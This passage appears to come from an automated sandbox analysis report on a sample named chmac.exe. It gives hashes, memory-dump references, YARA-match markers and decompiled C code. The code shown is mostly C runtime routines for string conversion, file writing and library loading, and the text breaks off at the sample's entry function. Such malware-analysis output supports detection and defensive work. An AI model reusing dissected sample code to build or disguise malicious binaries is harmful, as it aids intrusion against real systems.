Instruction Fuzzy Hash: 6DD0127060920ECFCB48FB74E49852C7BE1BF84315F10895DE15BC7299EB306C40A706

Uniqueness

Uniqueness Score: -1.00%

Function 04880180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f03bd7b53dc6e7f9f8f488ff98603486db9a49739edfb96ac34a2d555f8a426f
Instruction ID: afb13588ca21048ed08053eca7bb91ef3a54267c80aa81e735363905a9576a6f
Opcode Fuzzy Hash: f03bd7b53dc6e7f9f8f488ff98603486db9a49739edfb96ac34a2d555f8a426f
Instruction Fuzzy Hash: 65D01230216304CFCB183B70E41941C37B9AB48206340087CE80687B64EE37E891DA40

Uniqueness

Uniqueness Score: -1.00%

Function 04882EC0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f8033cd8768f82263b9bff1d70ff7d5e7233c56639fc9cc8a873becab4d93c
Instruction ID: bfb647e706c704b47e129dcdda17244a94808c1113c3819ee36d57ce1ca2057f
Opcode Fuzzy Hash: 99f8033cd8768f82263b9bff1d70ff7d5e7233c56639fc9cc8a873becab4d93c
Instruction Fuzzy Hash: A2B092312682090BEB60ABBA7848B66338C9780619F4405A5B80CC5902E546E4E13184

Uniqueness

Uniqueness Score: -1.00%

Function 04882D30, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db677a894725228839c53c4088368c0f0857e3312e1bf632be6b70a619f00b28
Instruction ID: 637a9141c097c89d85dce458fba5636ed5944e458c34002071c2f2b66c5be39a
Opcode Fuzzy Hash: db677a894725228839c53c4088368c0f0857e3312e1bf632be6b70a619f00b28
Instruction Fuzzy Hash: 0FC048353CC60DE6E6A43284AC1EB743A18970CB0EE100E8AA20A980E83581B1206196

Uniqueness

Uniqueness Score: -1.00%

Function 04880660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f0ce7e993438bd766cb668a9af85d4699c751ae43360ebb32677a6450f7d9c
Instruction ID: 38efab44f0b9d772b19e18fa0fa06f059cd1407e04a82fb84092b293ea658e5e
Opcode Fuzzy Hash: e3f0ce7e993438bd766cb668a9af85d4699c751ae43360ebb32677a6450f7d9c
Instruction Fuzzy Hash: 0AC02B7018E30CCEC214B7B01C05439B3195FC2308700CD39940260032993274A2B811

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x33cb8983
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x33cb8983
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x33cb8983
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x33cb8983
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x33cb8984
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chmac.exe PID: 6760 Parent PID: 3352 chmac.exeCOMMON

Executed Functions

Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
